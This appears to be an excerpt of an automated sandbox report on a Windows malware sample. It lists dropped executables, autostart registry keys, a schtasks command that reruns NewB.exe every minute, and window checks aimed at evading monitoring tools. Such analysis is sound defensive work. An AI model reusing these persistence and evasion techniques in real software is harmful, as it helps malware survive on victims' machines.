Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\7oogYDdOsBiWJ9MKZ1L5HbFc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\Uni400uni[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\dAQPk6VJcRnzNryadPob76ur.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\FUb10VYVGNCyaJzEYAYj3GQs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\VScSUh49U4ILUy7wHZccpWfB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\s72QQ1HEDtqfs0ltMB4uulZT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\yhDNs5CKgcvWpHQdXrg6et6I.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\b7aAk4NsmjOyCEFaPAgyoXSd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\AyNYT4O47VfBk09nQnrCijm6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\bhUVpYwvm9Cx2G2Rs1dNzx32.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\ilujg24U0DrNyFRHYG8F01Xq.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\gold[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\p2n3E86Xy4ldROofshdOCL5V.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\eVxkDSvCJmjQQtpfadM6vVRZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\tqElYl8Fl4JU3kvWVy6e00VW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\j5y10uqj39KWgJqNPePuwKtH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\PX9pw9BSDC6GcNiwEOwN9eIo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\swiiii[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\file300un[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\RTdjK9qJEXQ928Kc9bfdj8uO.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\l9eBjdHLCrnnkZZKJdDffPtE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\lGY9WNr93099Iipz5J2xUIwU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\BD2oseXp7BCvMSmO4ZjO5L8H.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\fNXuIJPtZ25Cf8AC2M7nLhvu.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\ngPRyE3pVf7AVqsG4El6sbei.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\dG8PuyJTCxed1f6M5xR2MLtX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\Mpw4JlCHhiliCOOFY4izjnxd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\szmZp5wR4ysalkWrHfDx3ALH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\QOC4MrQyBEQHndqZcvBUgBgA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\4767d2e713f2021e8fe856e3ea638b58[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\EwtRoEOPYdd062EDD7ELX587.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\NXiJY5ksTtPuwWHLdp7c611m.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\2dRkzCtGWj8VKkanaZyDrBYJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\oda8FFwXlvLarxOY0ZoPcs8X.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\pVHGmT1xb3UJCnVvgRWBUZ7Y.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\rig4vLmrODGxubaXNA7eu9mO.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe

File created: C:\ProgramData\wikombernizc\reakuqnanrkn.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

File created: C:\Windows\Tasks\explorgu.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run random.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run random.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001AC858 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

26_2_001AC858

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
